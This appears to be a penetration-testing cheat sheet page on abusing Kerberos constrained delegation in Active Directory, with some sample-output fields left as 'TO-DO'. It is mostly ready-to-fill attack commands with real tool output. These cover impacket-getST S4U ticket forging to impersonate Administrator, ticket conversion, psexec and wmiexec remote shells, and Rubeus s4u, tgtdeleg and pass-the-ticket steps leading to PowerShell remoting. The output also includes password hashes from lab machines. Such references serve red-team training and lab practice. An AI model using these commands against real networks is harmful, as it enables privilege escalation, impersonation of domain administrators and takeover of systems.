Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Privesc #1: Forge a Ticket
1. Pre-Check
# With password
impacket-findDelegation '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>
Sample Output:
TO-DO# With hash
impacket-findDelegation '<DOMAIN>/<USER>' -dc-ip <DC_IP> -hashes :<HASH> -no-pass
Sample Output:
TO-DO2. Get a Service Ticket
sudo ntpdate -s <DC> && impacket-getST -dc-ip <DC_IP> -spn '<SERVICE>/<TARGET_DOMAIN>' -hashes :<HASH> -impersonate '<IMPERSONATE_USER>' '<DOMAIN>/<USER>'
Sample Output:
$ sudo ntpdate -s dc.intelligence.htb && impacket-getST -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :80d4ea8c2d5ccfd1ebac5bd732ece5e4 -impersonate Administrator 'intelligence.htb/svc_int'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@www_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
3. Convert Ticket [Optional]
python3 rubeustoccache.py '<BASE64_TICKET>' '<IMPERSONATE_USER>.kirbi' '<IMPERSONATE_USER>.ccache'
Sample Output:
python3 ~/Tools/RubeusToCcache/rubeustoccache.py 'doIG9DCCBv ...[SNIP]... 9yZS5jb20=' 'administrator.kirbi' 'administrator.ccache'
╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐ ┌┬┐┌─┐ ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐ │ │ │ ║ │ ├─┤│ ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘ ┴ └─┘ ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
By Solomon Sklash
github.com/SolomonSklash
Inspired by Zer1t0's ticket_converter.py
[*] Writing decoded .kirbi file to administrator.kirbi
[*] Writing converted .ccache file to administrator.ccache
[*] All done! Don't forget to set your environment variable: export KRB5CCNAME=administrator.ccache
4. Remote
export KRB5CCNAME='<CCACHE_FILE>'
Sample Output:
$ export KRB5CCNAME=Administrator@www_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
# psexec
sudo ntpdate -s <DC> && impacket-psexec '<DOMAIN>/<IMPERSONATE_USER>@<TARGET_DOMAIN>' -k -no-pass
Sample Output:
$ impacket-psexec client.example.com/administrator@dc01.client.example.com -k -no-pass
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Requesting shares on dc01.client.example.com.....
[*] Found writable share ADMIN$
[*] Uploading file MOjmtmkC.exe
[*] Opening SVCManager on dc01.client.example.com.....
[*] Creating service NTdz on dc01.client.example.com.....
[*] Starting service NTdz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
# wmiexec
sudo ntpdate -s <DC> && wmiexec.py '<DOMAIN>/<IMPERSONATE_USER>@<TARGET_DOMAIN>' -k -no-pass
Sample Output:
$ sudo ntpdate -s dc.intelligence.htb && wmiexec.py -k -no-pass administrator@dc.intelligence.htb
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
Note: impacket-wmiexec may not work
1. Pre-Check
# Import powerview
. .\PowerView.ps1
Sample Output:
TO-DO# Check msds-allowedtodelegateto
Get-NetUser -TrustedToAuth
Sample Output:
TO-DO
2. Calculate Hash
.\rubeus.exe hash /password:'<PASSWORD>' /user:'<USER>' /domain:<DOMAIN>
Sample Output:
TO-DO3. Get a Service Ticket
.\rubeus.exe s4u /user:'<USER>' /aes256:<HASH> /impersonateuser:'<IMPERSONATE_USER>' /domain:<DOMAIN> /msdsspn:'<SERVICE>/<TARGET_DOMAIN>' /altservice:<ALT_SERVICE> /nowrap /ptt
Sample Output:
.\rubeus.exe s4u /user:'MS01$' /rc4:7ddf32e17a6ac5ce04a8ecbf782ca509 /impersonateuser:administrator /msdsspn:"cifs/dc01.client.example.com" /nowrap /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: S4U
[*] Using rc4_hmac hash: 7ddf32e17a6ac5ce04a8ecbf782ca509
[*] Building AS-REQ (w/ preauth) for: 'CLIENT.EXAMPLE.COM\MS01$'
[*] Using domain controller: 172.16.1.2:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFljCCBZKg ...[SNIP]... hPUkUuQ09N
[*] Action: S4U
[*] Building S4U2self request for: 'MS01$@CLIENT.EXAMPLE.COM'
[*] Using domain controller: DC04.CLIENT.EXAMPLE.COM (172.16.1.2)
[*] Sending S4U2self request to 172.16.1.2:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'MS01$@CLIENT.EXAMPLE.COM'
[*] base64(ticket.kirbi):
doIGGjCCBh ...[SNIP]... cbBU1TMDIk
[*] Impersonating user 'administrator' to target SPN 'cifs/dc01.client.example.com'
[*] Building S4U2proxy request for service: 'cifs/dc01.client.example.com'
[*] Using domain controller: DC04.CLIENT.EXAMPLE.COM (172.16.1.2)
[*] Sending S4U2proxy request to domain controller 172.16.1.2:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc01.client.example.com':
doIG9DCCBv ...[SNIP]... 9yZS5jb20=
[+] Ticket successfully imported!
# Or Create a sacrificial process
.\rubeus.exe s4u /user:'<USER>' /aes256:<HASH> /impersonateuser:'<IMPERSONATE_USER>' /domain:<DOMAIN> /msdsspn:'<SERVICE>/<TARGET_DOMAIN>' /altservice:<ALT_SERVICE> /nowrap /ptt /createnetonly /program:C:\Windows\System32\cmd.exe
Sample Output:
TO-DO2. Request a TGT
.\rubeus.exe tgtdeleg /nowrap /ptt
Sample Output:
TO-DO3. Get a Service Ticket
.\rubeus.exe s4u /user:'<USER>' /ticket:'<BASE64_TICKET>' /impersonateuser:'<IMPERSONATE_USER>' /domain:<DOMAIN> /msdsspn:'<SERVICE>/<TARGET_DOMAIN>' /altservice:<ALT_SERVICE> /nowrap /ptt
Sample Output:
TO-DO# Or Create a sacrificial process
.\rubeus.exe s4u /user:'<USER>' /ticket:'<BASE64_TICKET>' /impersonateuser:'<IMPERSONATE_USER>' /domain:<DOMAIN> /msdsspn:'<SERVICE>/<TARGET_DOMAIN>' /altservice:<ALT_SERVICE> /nowrap /ptt /createnetonly /program:C:\Windows\System32\cmd.exe
Sample Output:
TO-DO4. Remote
# Check
klist
Sample Output:
TO-DO# Create session
$session = new-pssession -computername <COMPUTER_NAME>
Sample Output:
TO-DO# Execute cmd
invoke-command $session { <CMD> }
Sample Output:
TO-DO